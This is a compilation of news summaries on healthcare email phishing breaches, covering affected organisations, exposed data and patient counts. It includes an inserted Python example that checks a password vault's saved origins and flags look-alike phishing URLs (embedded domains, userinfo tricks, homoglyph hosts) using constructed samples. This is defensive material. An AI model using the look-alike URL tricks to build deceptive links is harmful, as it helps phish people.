Affected people were informed and a one-year membership to a credit monitoring service was offered for free to persons whose Social Security numbers were exposed. iRise has examined its email security procedures and has carried out extra technical safeguards, which include multifactor authentication. The workforce is also provided extra training on email security.

Volunteers of America Southwest California

Volunteers of America Southwest California, a social service organization based in San Diego, CA, recently announced it had experienced a phishing attack. A worker received an email resembling a voicemail notification, with a hyperlink to a web page that required the input of login information in order to listen to the message. The access credentials were captured and used to view the staff member’s email account.

The attackers viewed the email account on or about November 16, 2021, and the attack was discovered and the account secured on November 16. An evaluation of the email account showed it contained the first and last names of clients in most cases, with a number of the records also including the COVID-19 vaccination status of individuals.

The breach appears to have been fully remediated and third-party specialists were employed to verify the containment steps. Email security was enhanced because of the breach.

The organization submitted the breach report to the HHS’ Office for Civil Rights indicating that 1,300 people were affected.

More than 30 Healthcare Providers Affected by CIOX Health Data Breach

The health information management services provider CIOX Health experienced a data breach that has affected no less than 32 healthcare providers. In July 2021, CIOX Health found out an unauthorized individual had acquired access to the email account of a worker in the customer service team. The email account was promptly secured, and the subsequent investigation affirmed that the email account was first accessed by an unauthorized person on June 24, 2021, with continuing access until the security breach was identified on July 2, 2021.

Based on the breach investigation by CIOX Health, it was confirmed that the incident was limited to just one staff email account. An audit of the data in the email account on September 24, 2021 revealed that it contained emails and file attachments that held the protected health information (PHI) of some of its healthcare provider clients, such as names, dates of birth, provider names, dates of service, and the Social Security numbers, driver’s license numbers, health insurance data, and/or treatment details of a very limited number of people.

The worker in question worked in customer support and therefore assisted healthcare company clients throughout the country with billing problems and other customer service needs, hence the substantial number of impacted clients. The staff member did not, however, have access to the medical record systems of any of its healthcare provider clients.

CIOX Health stated that while the account was accessible it is likely that emails containing protected health information were viewed or copied; however, no direct evidence of attempted or actual misuse of patient data was found. CIOX Health is convinced that the email account was compromised to send out phishing email messages from the company domain to persons not related to CIOX Health.

CIOX Health is advising all people affected by the breach to take a look at their statements and explanation of benefits statements from their healthcare companies and insurance companies for any indication of unauthorized use of their information.

As a result of the breach, CIOX Health will implement stronger email security measures and will provide the workers with additional security awareness training.

On December 30, 2021, CIOX Health started sending notifications to impacted healthcare company clients regarding the breach. Healthcare providers found to have been affected by the CIOX Health email account breach are the following:

Alabama Orthopaedic Specialists
AdventHealth in Orlando
Baptist Memorial Health Care
Butler Health Systems
Centra Health
Cameron Memorial Community Hospital
Children’s Healthcare of Atlanta
Copley Hospital
Coastal Family Health Center
DeSoto Memorial Hospital Health System
EvergreenHealth
Hospital Sisters Health System
Hoag Health System
Huntsville Hospital Health System
Indiana University Health
MD Partners
McLeod Health System
Niagara Falls Memorial Medical Center Health System
Northwestern Medicine
Northern Light Mercy Hospital
Ohio State University Health System
OrthoConnecticut
Prisma Health – Palmetto Health
Prisma Health – Greenville Health System
Sarasota County Public Hospital District d/b/a Sarasota Memorial Health Care System
Trinity Health – Mount Carmel Health System
Trinity Health – Holy Cross Hospital
Trinity Health – Saint Alphonsus Health System
Trinity Health – St. Joseph Mercy Health System
Trinity Health – St. Francis Medical Center
Union Hospital Healthcare System
Women’s Health Specialist

CIOX Health reported the security breach to the HHS’ Office for Civil Rights indicating that 12,493 individuals were impacted.

UH College of Optometry and Valley Mountain Regional Center Report Data Breaches

The University of Houston College of Optometry has found out that an unauthorized person outside the United States acquired access to an affiliated eye clinic’s networks and stole data held in the clinic’s database.

The Community Eye Clinic based in Fort Worth, TX, is managed by UH College of Optometry. The security team discovered the attack on September 13, 2021, a day after the breach happened. The IT security team promptly took action to protect the system, implemented additional defensive safety measures to better secure patient information, and enhanced its monitoring and notifications. The security team also reviewed the clinic’s IT guidelines and procedures to make sure that industry-standard protocols are implemented.

The attacker obtained files associated with patients who got services at the Community Eye Clinic from May 22, 2013, to September 13, 2021. The information in the database included names, birth dates, contact details, government ID numbers, medical insurance data, Social Security numbers, passport numbers, driver’s license numbers, diagnosis, and treatment details. There was no financial data kept in the database and the attack did not affect the University of Houston or College of Optometry network systems.

The 18,500 impacted persons were instructed to monitor their explanation of benefits statements and accounts for signs of fraudulent transactions, to review their credit reports, and to place a fraud alert on their credit reports.

17,197 Patients Affected by Valley Mountain Regional Center Phishing Attack

Valley Mountain Regional Center (VMRC) based in Stockton, CA has begun informing 17,197 patients that unauthorized individuals accessed some of their protected health information (PHI) located in breached email accounts.

VMRC found phishing emails in its inboxes on September 15, 2021, and removed all the messages from its email accounts; nevertheless, the following investigation of the phishing attack showed that 14 workers had clicked the hyperlinks and shared credentials that permitted access to their email accounts.

A thorough analysis of the contents of the impacted inboxes affirmed they included names, addresses, birth dates, state-issued client identifier numbers, phone numbers, personal email addresses, diagnoses, prescription drugs, dates of service, and other unique identifiers.

VMRC stated no proof was found that suggests the attacker accessed, obtained, or misused any data in the email accounts; nevertheless, impacted individuals were instructed to keep track of their accounts and credit reports for strange transactions.

Data Breaches Suffered by PracticeMax and UMass Memorial Health

Anthem health plan members who have End-Stage Kidney Disease and are signed up in the VillageHealth program were notified about the potential compromise of some of their protected health information (PHI) during a ransomware attack.

VillageHealth assists Anthem plan members through coordinating care between the dialysis center, nephrologists, and healthcare providers and shares the results with Anthem through its vendor, PracticeMax.

PracticeMax provides business management and information technology solutions to healthcare companies. It identified the attack on May 1, 2021. According to the investigation, the attackers obtained access to its systems on April 17, 2021, and had continuing access possibly until May 5, 2021. PracticeMax said it regained access to its IT systems on the following day.

A forensic analysis of the attack affirmed that it affected one server that held protected health information (PHI), which the attackers may have accessed and acquired.

The investigation into the incident finished on August 19, 2021, and established the exposure of the following types of data: First and last name, address, date of birth, phone number, Anthem member ID number, and clinical information associated with kidney care services obtained. There were no compromised financial details or Social Security numbers.

PracticeMax states it has performed an evaluation of its policies and protocols and has applied extra safeguards to prevent future attacks, which include rebuilding systems, utilizing more endpoint security solutions, and improving its firewalls. Affected individuals were provided complimentary credit monitoring services for 24 months.

UMass Memorial Health Notifies Patients With Regards to Phishing Attack

UMass Memorial Health has found out that unauthorized persons obtained access to some employees’ email accounts after the employees responded to phishing emails. The phishing attack was identified on August 25, 2021 when suspicious activity was noticed in its email environment.

UMass blocked unauthorized access to the email accounts right away and launched a forensic investigation, with support from a third-party computer forensics company. The investigation affirmed the breach of the email accounts from June 24, 2020 until January 7, 2021, and in the course of that time, the unauthorized individuals had access to PHI stored in the email accounts.

Although no proof was found that the attackers had viewed or acquired the emails, the possibility could not be ruled out. An evaluation of the PHI within the accounts was done on August 25, 2021. The compromised information includes names, financial account information, driver’s license numbers, and Social Security numbers. UMass Memorial Health stated free credit monitoring and identity theft protection services were given to impacted people. UMass Memorial stated it is improving email security and will be re-educating the employees on email guidelines.

The breach has been reported to the Maine Attorney General as affecting a total of 3,099 individuals across the United States.

How Password Managers Protect MSPs

The offering of password managers for MSPs is a quickly growing business. This is because cybercriminals are increasingly targeting Managed Service Providers. A recent “State of the Channel” survey revealed that 95% of MSP respondents said their own businesses were being attacked instead of the clients they provide with managed services.

It’s obvious why cybercriminals are attacking MSPs. When a “supply-chain ransomware attack” on an MSP succeeds, it could keep the MSP from providing its clients with its services; and even if only the MSP’s systems are encrypted, clients can’t run their businesses because of the type of services delivered by the MSP.

Cybercriminals are also attacking SMB clients, but not as much as MSPs. The Datto “State of the Channel” survey reported that 78% of the respondents stated SMB clients had been attacked in the last two years, with spyware, adware, and viruses causing as much trouble as ransomware. Even more troubling were the methods used by the cybercriminals to access systems and deploy malware:

  • 54% of respondents reported attacks that were due to a phishing email.
  • 27% of respondents reported attacks that were due to poor user practices.
  • 26% of respondents reported attacks that were due to a lack of cybersecurity training.
  • 24% of respondents reported attacks that were due to weak passwords and bad credential management.

Other respondents stated that attacks succeeded because of lost and stolen user credentials, a lack of funding for IT security, and a lack of executive buy-in for using security tools. All of these causes are preventable or could be mitigated by employing a password manager for MSPs.

How Can Password Managers Protect MSPs

One statistic missing from Datto's State of the Channel report is the number of cyberattacks due to MSP susceptibility versus the number of cyberattacks due to client susceptibility. Although it could be presumed that clients are easier targets because of a lack of security competence, the report does say that over fifty percent [of MSPs] now use multi-factor authentication and password management tools.

Using the word “now” implies that less than fifty percent of MSPs were using password management tools in the past. Once again, there is no differentiation between the exclusive use of password managers within the MSP companies and the provision by MSPs of password-management-as-a-service to clients.

The way login credentials are created, saved, and shared between teams can affect a business's online protection. According to research, a lot of employees use weak passwords simply because they are easier to remember, re-use passwords across several accounts to avoid having to recall several passwords, save login credentials in unprotected files, and share passwords through unsecured channels of communication like email, chat services, and SMS.

When companies use a password manager, they can also implement password policies requiring the use of strong, unique passwords for every account. The majority of commercial password managers feature cross-browser, cross-platform synchronization, integration with directory services, and encrypted credential sharing, so employees have a secure means to exchange passwords, credit card information, and other sensitive data.

Password managers for MSPs may be used to secure both business credentials and clients’ credentials. Passwords are kept in a protected user vault and, whenever a user visits a site for which the vault has a saved password, the sign-in credentials are auto-filled. Therefore, when a user unintentionally clicks a link in a phishing email and lands on a phony site, the sign-in credentials won’t auto-fill, which alerts the user to a likely threat.
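The origin check behind that auto-fill behaviour, sketched as an added Python example (not code from any password manager or from the original article). The vault entry, host names and function names are constructed for illustration; because the decision depends only on the URL, the answer is the same whether the page is a copied login form or the real site relayed through a reverse proxy.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed vault for the example: one saved login, keyed by the exact
# origin (scheme, host, port) of the page it was saved on.
VAULT = {
    ("https", "portal.clinic.example", 443): {"username": "jdoe", "secret_ref": "vault-item-1"},
}


def origin_of(url):
    """Return (scheme, host, port) for a URL, or None if it has no usable web origin."""
    try:
        parts = urlsplit(url.strip())
        scheme = parts.scheme.lower()
        host = (parts.hostname or "").rstrip(".")
        if scheme not in DEFAULT_PORTS or not host:
            return None
        # Normalise internationalised names to their ASCII (punycode) form so a
        # look-alike Unicode letter can never compare equal to the ASCII name.
        host = host.encode("idna").decode("ascii").lower()
        port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    except ValueError:  # malformed URL, bad port, or un-encodable host name
        return None
    return (scheme, host, port)


def lookalike_hint(host):
    """Explain why an unknown host resembles a saved one, or return None."""
    if any(label.startswith("xn--") for label in host.split(".")):
        return "host contains non-ASCII (punycode) labels"
    for _, saved_host, _ in VAULT:
        if host != saved_host and saved_host in host:
            return "saved host " + saved_host + " is embedded in a different domain"
    return None


def autofill_decision(page_url):
    """Return (credential_or_None, reason) for the page the browser is showing."""
    origin = origin_of(page_url)
    if origin is None:
        return None, "no fill: not a web origin"
    entry = VAULT.get(origin)
    if entry is not None:
        return entry, "fill: exact origin match"
    host = origin[1]
    if any(saved_host == host for _, saved_host, _ in VAULT):
        return None, "no fill: saved host, but scheme or port differs"
    if "@" in urlsplit(page_url.strip()).netloc:
        # Everything before '@' is userinfo; the real host comes after it.
        return None, "warn: URL has userinfo before the real host " + host
    hint = lookalike_hint(host)
    if hint:
        return None, "warn: " + hint
    return None, "no fill: no saved login for " + host


# Constructed sample URLs: the saved site followed by look-alike variants.
SAMPLE_URLS = [
    "https://portal.clinic.example/login",
    "https://portal.clinic.example.login-check.test/login",
    "https://portal.clinic.example@mailbox-verify.test/login",
    "https://p\u043ertal.clinic.example/login",  # Cyrillic 'o' in the first label
    "http://portal.clinic.example/login",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        credential, reason = autofill_decision(sample)
        print(("FILL   " if credential else "REFUSE ") + reason + "  <-  " + sample)
```

A refusal to fill on a page that looks familiar is the signal to report the message rather than type the password by hand.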

With password policies requiring good password practices, users taught good password hygiene, and the possibility of weak passwords removed, the major methods used by cybercriminals to access MSP systems are eliminated. As for the lack of funds for IT security or executive buy-in, password managers for MSPs are affordable in comparison to the price of recovering from a cyberattack and, if offered to clients as “password-management-as-a-service,” could bring in more revenue than they cost.

Phishing Attacks at Star Refining & Express MRI

Express MRI, a medical imaging center based in Peachtree Corners, GA, has begun informing patients regarding the exposure of some of their protected health information (PHI) due to a historic data breach. Express MRI found out on July 10, 2020 that an unauthorized person had acquired access to one email account and used it to send unauthorized email messages. The incident was investigated at the time, and it was concluded that no patient data had been accessed.

On June 10, 2021, another evaluation of the security breach was done, and although no particular evidence was found that suggested unauthorized data access or theft, Express MRI concluded that it was not feasible to completely rule out data access or exfiltration by unauthorized individuals. For that reason, Express MRI issued breach notification letters.

An analysis of the breached account confirmed the potential access or exfiltration of the following data: names, email addresses, addresses, birth dates, patient ages, referring doctor names, part of the body scanned, and whether the scan was associated with a workers’ compensation claim or investigation of a motor vehicle accident. There is no other patient information present in the breached email accounts.

Express MRI stated it took the essential and prompt steps to deal with the incident, which include putting together a team of very competent experts to strengthen the security of its data systems and carry out more safety measures to avoid other breaches.

Star Refining Phishing Attack Impacts 1,910 People

Adelda Health, Inc., also known as Star Refining, has found out that unauthorized persons obtained access to several employees’ email accounts after the employees responded to phishing emails. The personal data of 1,910 people may have been accessed or exfiltrated.

The dental refining company in West Palm Beach, FL discovered the breach on April 29, 2021. A third-party computer forensics company is helping to make sure the incident was completely remediated and to find out the nature and extent of the breach.

An analysis of the breached email accounts showed they contained sensitive information like first and last names, postal addresses, Social Security numbers, driver’s license numbers, and credit card/financial details; nevertheless, there is no evidence that suggested the emails with that data were seen or obtained during the breach of the accounts. The first account access happened on April 12, 2021.

Notifications began to be delivered to impacted persons on July 22, 2021. Free Identity Works credit monitoring and identity theft protection services via Experian were given to impacted persons.

Over 447K Patients Impacted by Orlando Family Physicians Phishing Attack

An unauthorized person accessed the email accounts of Orlando Family Physicians in Florida that contain the protected health information (PHI) of 447,426 patients.

Orlando Family Physicians stated that the compromise of the first email account happened on April 15, 2021 because an employee responded to a phishing email and exposed their account login information. The provider immediately took action to stop unauthorized access and started an investigation to find out the nature and scope of the breach.

With the help of a top-rated cybersecurity forensics company, Orlando Family Physicians confirmed that three more employee email accounts were accessed by the unauthorized person. External access to the four compromised email accounts was blocked within 24 hours of the first unauthorized account access.

On May 21, 2021, Orlando Family Physicians confirmed that the unauthorized person possibly accessed email messages in the email account that included patients’ PHI. A review of the email messages and attachments was done, and on July 9, 2021, Orlando Family Physicians had identified all impacted persons.

The email accounts included the personal data and PHI of present patients, prospective patients, workers, and other people. The types of data in the accounts differed from person to person and included at least one of these data elements: Names, demographic information, diagnoses, names of providers, prescription medications, medical record numbers, patient account numbers, medical insurance data (Medicare beneficiary number or another subscriber ID number), and passport numbers.

The phishing attack seems to have been executed with the goal of committing financial fraud against the practice rather than acquiring patient records. Nonetheless, because unauthorized data access and exfiltration cannot be excluded, impacted persons have been instructed to exercise extreme care and carefully monitor their explanation of benefits statements and financial accounts for indications of fraudulent transactions.

Orlando Family Physicians has improved its technical security procedures after the breach and additional training on email security is being given to its employees.

More than 200,000 People Potentially Impacted by ClearBalance Phishing Attack

ClearBalance in San Diego, CA, a loan provider that allows patients to spread the cost of their hospital expenses, was affected by a phishing attack on March 8, 2021, in which workers were fooled into exposing their sign-in credentials.

ClearBalance discovered the email system breach on April 26, 2021 when the hacker tried to make a bogus wire transfer. Action was quickly taken to protect the email system and stop more unauthorized access, and the attempt to make a wire transfer did not succeed. No money was moved to the hacker’s account.

A third-party computer forensic team was engaged to look into the breach and to figure out if the attacker viewed or acquired any sensitive information. The investigator affirmed that the breach only affected the email system and did not affect any other system, and that the unauthorized person was blocked from accessing the email accounts on the day the breach was discovered.

The attacker did not obtain access to the database that holds the health care record systems of any healthcare company; nevertheless, some sensitive information was found in email messages and file attachments that were possibly accessed. An analysis of the email accounts’ contents showed they included these data elements:

Names, tax IDs, birth dates, Social Security numbers, government-issued ID numbers, phone numbers, balance amounts, healthcare account numbers, dates of service, ClearBalance loan numbers and balances, private banking details, clinical data, medical insurance data, and full-face photographic images. For most people, PHI was not affected.

Security measures were strengthened to better secure the email system and personal information, all user passwords were changed, stronger access settings were put in place on the system, and procedures for submitting suspicious activity reports were updated.

The objective of the attack seems to be to make bogus wire transfers instead of getting sensitive information; nevertheless, as a safety measure against identity theft and fraud, ClearBalance provided impacted people with free identity theft protection services, 2 years of credit monitoring services, and payment insurance coverage plus an identity theft insurance reimbursement guide.

The breach was submitted to the HHS’ Office for Civil Rights as impacting 209,719 people.

Phishing Attack on Saint Alphonsus Health System and Southeastern Minnesota Center for Independent Living

Saint Alphonsus Health System based in Boise, ID experienced a phishing attack that resulted in the potential exposure of patient information. The attack also impacted patients of Saint Agnes Medical Center in Fresno, CA.

Saint Alphonsus discovered strange activity in the email account of one worker on January 6, 2021. The provider quickly secured the account and conducted an investigation to find out the source and nature of the phishing activity. Saint Alphonsus learned that an unauthorized individual accessed the email account on January 4, 2021, and had access to the account and data held therein for 2 days. The attacker used the email account to send phishing emails to other contact people in an attempt to steal usernames and passwords.

The employee whose credentials were compromised assisted with a number of business functions that required access to protected health information (PHI), including sending billing for the West Region of Trinity Health, and Fresno.

An analysis of all email messages and file attachments revealed the account comprised the PHI of selected patients. The PHI in the account varied from one patient to another and contained full names along with one or more of these data elements: telephone, date of birth, address, email, medical record number, treatment data, and/or billing details. The account additionally included some Social Security numbers and credit card numbers.

Although the provider confirmed the unauthorized account access, it was not possible to ascertain which emails, if any, the attacker accessed. At the time notifications were distributed, no evidence had been found that indicates the misuse of any patient information. Saint Alphonsus offered credit monitoring services to affected persons and gave workers further training about email and cybersecurity to avoid similar breaches in the future.

When patients were being notified about the breach, a mail merge error occurred. Some patients received a letter informing them of an email security issue and, regrettably, the letters generated had an incorrect status for a number of patients, addressing them as deceased or as a minor because of the mail merge issue.

It isn’t presently known how many patients were impacted by the breach. Updates will be provided when there’s more information available.

Southeastern Minnesota Center for Independent Living Phishing Attack Impacts 4,122 Individuals

Southeastern Minnesota Center for Independent Living (SEMCIL), a disability and support services provider in Rochester and Winona, has found out that an unauthorized person obtained access to the email account of an employee containing the PHI of 4,122 people.

An investigation into the security incident showed the account was exposed on August 6, 2020 and the hacker had access to the account until September 1, 2020. The investigation affirmed on December 22, 2020 the compromise of PHI, including names, addresses, dates of birth, driver’s license numbers, Social Security numbers, and certain medical treatment details. SEMCIL started sending breach notification letters to affected persons on February 19, 2021.

The investigation did not find any proof that suggests the access or exfiltration of any protected health information. Likewise, no report has been received that indicates the improper use of any PHI. As a safety measure against identity theft and fraud, those who had their Social Security number or driver’s license number exposed were offered free identity theft protection services.

PHI Exposed Due to Breaches at Elara Caring, ProPath and Cornerstone Care

Elara Caring, one of America’s largest home-based healthcare services providers, has experienced a phishing attack that impacted over 100,000 patients.

In mid-December, the provider identified suspicious activity in a number of employee email accounts. It took prompt action to secure the accounts and prevent the attackers from accessing them. A third-party security firm helped investigate the breach.

The investigation confirmed that an unauthorized individual accessed several employee email accounts, though no evidence was identified that suggests the attackers viewed or obtained any patient information in the email accounts. Data theft could not be ruled out.

An analysis of the exposed email accounts revealed they held the PHI of 100,487 patients, such as names, dates of birth, Employer ID numbers, driver’s license numbers, Social Security numbers, financial/bank account details, passport numbers, addresses, email addresses and passwords, insurance data and insurance account numbers. Elara Caring offered the individuals affected by the attack complimentary credit monitoring and identity protection services.

The provider also took steps to enhance data security and has given more training on cybersecurity to its employees.

ProPath Email Accounts Breached by an Unauthorized Individual

ProPath, the United States’ biggest nationwide, fully physician-owned pathology practice, has discovered that an unauthorized person gained access to two email accounts containing patient records.

The unauthorized individual accessed the email accounts between May 4, 2020 and September 14, 2020. ProPath found out on January 28, 2021 that protected health information in the email accounts included the names of patients, birth dates, test orders, diagnosis and/or clinical treatment information, medical procedure details, and physician name. The Social Security number, financial account information, driver’s license number, health insurance data, and/or passport number of a limited number of people were also affected.

Persons whose Social Security number was breached were provided credit monitoring services for free. Employees have received additional training to help them identify malicious email messages, and further technical security measures have now been implemented.

It is not yet confirmed exactly how many persons the incident impacted. ProPath stated most people who obtained testing from the company were not affected by the incident.

Cornerstone Care Email Account Breach Impacts 11,487 Patients

An unauthorized person accessed an email account that contained the PHI of 11,487 patients receiving services from Cornerstone Care community health centers located in Southwestern Pennsylvania and Northern West Virginia.

The provider detected the email account breach on June 1, 2020 and engaged third-party security specialists to assist with the investigation. It was established that the breach only impacted a single corporate email account. An evaluation of the PHI included in the account was finished on January 13, 2021.

The account held the names and addresses of patients as well as, for selected people, date of birth, Social Security number, medical background, ailment, treatment procedure, diagnosis, and/or medical insurance data. Those whose Social Security number was exposed received free credit monitoring and identity theft protection services.

Cornerstone Care notified the affected persons by mail on February 25, 2021. It also enforced multi-factor authentication on the email accounts.

3 Healthcare Providers Have Begun Notifying Patients Regarding Recent Phishing Attacks

This is a summary of healthcare phishing attacks that were publicly announced in the last couple of days.

2,254 Patients Affected by Email Account Breach at Leonard J. Chabert Medical Center

Leonard J. Chabert Medical Center was notified that the protected health information (PHI) of some of its patients was compromised because of a phishing attack on LSU Health New Orleans Health Care Services Division (LSU HCSD).

LSU HCSD reported a breach on November 20, 2020. On November 24, 2020, it found out that some patient information from Leonard J. Chabert Medical Center, one of its partner hospitals, had likewise been affected by the breach.

Leonard J. Chabert Medical Center received information about the breach on December 3, 2020, the evaluation of which showed that the PHI of 2,254 patients was exposed from September 15, 2020 up to September 18, 2020.

For the majority of patients, the exposed information only included names, telephone numbers, addresses, health record numbers, birth dates, account numbers, types of services received, dates of service, and medical insurance identification numbers. Limited health data, such as diagnoses, and/or bank account numbers of a small number of patients were likewise exposed.

LSU HCSD is reviewing its email security procedures, which will be improved to prevent similar breaches in the future, and more security awareness training will be given to staff members.

PHI of 1,800 Patients Possibly Compromised Due to Lynn Community Health Center Phishing Attack

Lynn Community Health Center (LCHC), based in Massachusetts, discovered that an unauthorized individual accessed a staff member’s email account after the staff member responded to a phishing email. LCHC discovered the phishing attack on November 25, 2020 and promptly secured the email account. With the help of a digital forensics agency, LCHC established that up to 4 email accounts were compromised in the phishing attack.

An analysis of the possibly breached accounts revealed they included patient names along with one or more of these data elements: mailing address, date of birth, phone number, insurance details, medical record number, diagnoses, and other clinical data. The Social Security numbers of a number of patients were additionally exposed.

The ongoing investigation has not found any evidence that suggests patient data theft or misuse. However, as a preventive measure, people who had their Social Security number potentially compromised were offered credit monitoring and identity theft protection services for free.

More safety measures are being put in place to avoid further email security breaches. Information protocols are being modified, and worker security awareness training was improved.

Auris Health Informs Patients Regarding March 2020 Email Account Breach

Auris Health, located in Redwood City, CA, started notifying a number of patients that an unauthorized person possibly obtained access to some of their PHI because of an employee email account breach in March 2020.

Upon learning of the breach, access to the account was blocked and an investigation was performed to find out the nature and magnitude of the breach. The inquiry into the attack is in progress. Nevertheless, Auris Health has learned that the compromised email account held patient names combined with at least one of the following data elements: tax identification number, Social Security number, passport number, health insurance number, health data, payment card details, and financial account number(s).

Auris Health is employing extra security measures to prevent further breaches, such as improving its email authentication procedures. Affected persons were offered complimentary membership to credit and identity theft monitoring services for two years.